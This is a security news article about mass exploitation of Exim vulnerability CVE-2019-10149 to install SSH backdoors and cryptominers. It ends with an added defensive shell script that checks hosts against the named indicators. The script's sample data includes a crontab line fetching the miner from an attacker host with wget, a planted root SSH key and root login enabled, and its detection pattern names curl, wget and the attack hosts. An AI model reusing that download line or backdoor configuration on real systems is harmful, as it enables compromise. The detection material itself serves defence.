Mass attack on vulnerable Exim-based mail servers

Security researchers at Cybereason have warned mail administrators that they have identified a mass attack exploiting the critical vulnerability CVE-2019-10149 in Exim, which was disclosed last week. During the attack, the attackers achieve execution of their code with root privileges and install cryptocurrency-mining malware on the server.

According to a June automated survey, Exim's share of mail servers is 57.05% (56.56% a year earlier), Postfix is used on 34.52% (33.79%), Sendmail on 4.05% (4.59%) and Microsoft Exchange on 0.57% (0.85%). According to the Shodan service, more than 3.6 million mail servers on the global network remain vulnerable because they have not yet been updated to the latest Exim release, 4.92. About 2 million of the vulnerable servers are located in the United States and 192 thousand in Russia. According to RiskIQ, 70% of Exim servers have already been moved to version 4.92.

Administrators are advised to install as a matter of urgency the updates that the distributions prepared last week (Debian, Ubuntu, openSUSE, Arch Linux, Fedora, EPEL for RHEL/CentOS). If a system runs a vulnerable Exim version (4.87 through 4.91 inclusive), check that it has not already been compromised: look for suspicious entries in crontab and for extra keys in the /root/.ssh directory. An attack can also be recognized by firewall log entries for the hosts an7kmd2wp4xo7hpr.tor2web.su, an7kmd2wp4xo7hpr.tor2web.io and an7kmd2wp4xo7hpr.onion.sh, which are used to download the malware.

The first attempts to attack Exim servers were recorded on June 9. By June 13 the attack had become mass-scale. After the vulnerability is exploited through tor2web gateways, a script is downloaded from the Tor hidden service (an7kmd2wp4xo7hpr) which checks for the presence of OpenSSH (installing it if absent), changes its configuration (enabling root login and key authentication) and installs an RSA key for the root user, giving the attackers privileged access to the system over SSH.

Once the backdoor is in place, a port scanner is installed on the system to find other vulnerable servers. The system is also searched for existing miners, which are removed if found. In the final stage, the attackers' own miner is downloaded and registered in crontab. The miner is downloaded under the file name ico (in fact a zip archive with the password "no-password") containing an ELF executable for Linux with Glibc 2.7+.
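The checks recommended above, together with the changes the downloaded script is described as making (root login enabled in sshd_config, a key added for root, a crontab entry for the miner), as an added triage script that is not part of the original article, of Exim or of the attackers' tooling. It assumes a POSIX shell with grep -E and awk. The only indicators it uses are the three hostnames named in the text; the log lines, crontab entries, SSH keys and sshd_config fragment are constructed sample data standing in for what would be read from a real host.

```shell
#!/bin/sh
# Added triage helper. It is not from the original article, not Exim's code and
# not the attackers' tooling: it turns the checks recommended above into shell
# functions that run against a host or, as here, against constructed sample data.
# Assumes POSIX sh with grep -E and awk. The only indicators are the three
# hostnames the article names; all sample keys, log and crontab lines are made up.

IOC_RE='an7kmd2wp4xo7hpr\.(tor2web\.(su|io)|onion\.sh)'

# exim_version_vulnerable VERSION -> status 0 when 4.87 <= VERSION <= 4.91, the
# range given above (4.92 carries the fix). Suffixes like "_RC3" or a third
# component are ignored. Typical input: $(exim -bV | awk 'NR==1 {print $3}').
exim_version_vulnerable() {
    major=${1%%.*}
    minor=${1#*.}
    minor=${minor%%[!0-9]*}
    minor=${minor:-0}
    [ "$major" = "4" ] && [ "$minor" -ge 87 ] && [ "$minor" -le 91 ]
}

# ioc_hits < log -> prints the number of lines naming an indicator host
# (firewall, proxy or resolver logs). Always exits 0 so it composes under set -e.
ioc_hits() {
    grep -E -c "$IOC_RE" || true
}

# suspicious_cron < crontab -> prints active entries that fetch remote content
# or reference the indicator hosts (the miner is re-launched from crontab).
suspicious_cron() {
    grep -v -E '^[[:space:]]*(#|$)' | grep -E -i "curl|wget|$IOC_RE" || true
}

# unexpected_keys BASELINE < authorized_keys -> prints "type blob" for each key
# not listed in BASELINE (newline-separated "type blob" entries root is expected
# to have). Option prefixes, comments and blank lines are ignored.
unexpected_keys() {
    awk -v base="$1" '
        BEGIN { n = split(base, b, "\n"); for (k = 1; k <= n; k++) known[b[k]] = 1 }
        !/^[[:space:]]*#/ && !/^[[:space:]]*$/ {
            for (i = 1; i <= NF; i++)
                if ($i ~ /^(ssh-|ecdsa-|sk-)/) {
                    key = $i " " $(i + 1)
                    if (!(key in known)) print key
                    break
                }
        }'
}

# permit_root_login < sshd_config -> prints the effective PermitRootLogin value.
# sshd honours the first occurrence; the intrusion script sets it to "yes".
# Prints "default" when the directive is absent.
permit_root_login() {
    v=$(awk 'tolower($1) == "permitrootlogin" { print tolower($2); exit }')
    printf '%s\n' "${v:-default}"
}

# --- constructed sample data, standing in for files read off a real host ------
DEPLOY_KEY='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedDeployKeyNotReal000000000000'
PLANTED_KEY='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDConstructedPlantedKeyNotReal00000000000'

sample_log() {
    cat <<'EOF'
Jun 13 03:12:44 mx1 named[811]: query: an7kmd2wp4xo7hpr.tor2web.su IN A
Jun 13 03:12:45 mx1 squid[902]: GET http://an7kmd2wp4xo7hpr.onion.sh/ico 200
Jun 13 03:13:01 mx1 kernel: OUT=eth0 DST=192.0.2.10 DPT=25 ACCEPT
EOF
}

sample_crontab() {
    cat <<'EOF'
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/10 * * * * root wget -q -O /tmp/.ico http://an7kmd2wp4xo7hpr.tor2web.io/ico
EOF
}

sample_authorized_keys() {
    printf '# key used by the deployment host\n%s ops@bastion\n%s root@mx1\n' \
        "$DEPLOY_KEY" "$PLANTED_KEY"
}

sample_sshd_config() {
    printf '#PermitRootLogin prohibit-password\nPermitRootLogin yes\nPubkeyAuthentication yes\n'
}

main() {
    ver=${1:-4.91}
    if exim_version_vulnerable "$ver"; then
        echo "Exim $ver is in the vulnerable range 4.87-4.91; check for compromise:"
    fi
    echo "indicator hosts seen in logs: $(sample_log | ioc_hits)"
    echo "crontab entries to review:"; sample_crontab | suspicious_cron
    echo "root keys not in baseline:";  sample_authorized_keys | unexpected_keys "$DEPLOY_KEY"
    echo "PermitRootLogin: $(sample_sshd_config | permit_root_login)"
}

main "$@"
```

On a live host, feed the real files instead of the sample functions: the version string from `exim -bV`, the output of `crontab -l` and the files under /etc/cron* as the crontab text, /root/.ssh/authorized_keys as the key list and /etc/ssh/sshd_config as the daemon configuration, with the baseline argument to unexpected_keys set to the keys the administrator knows were provisioned. A clean result only means this campaign's described traces are absent, not that the host is clean.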

Source: opennet.ru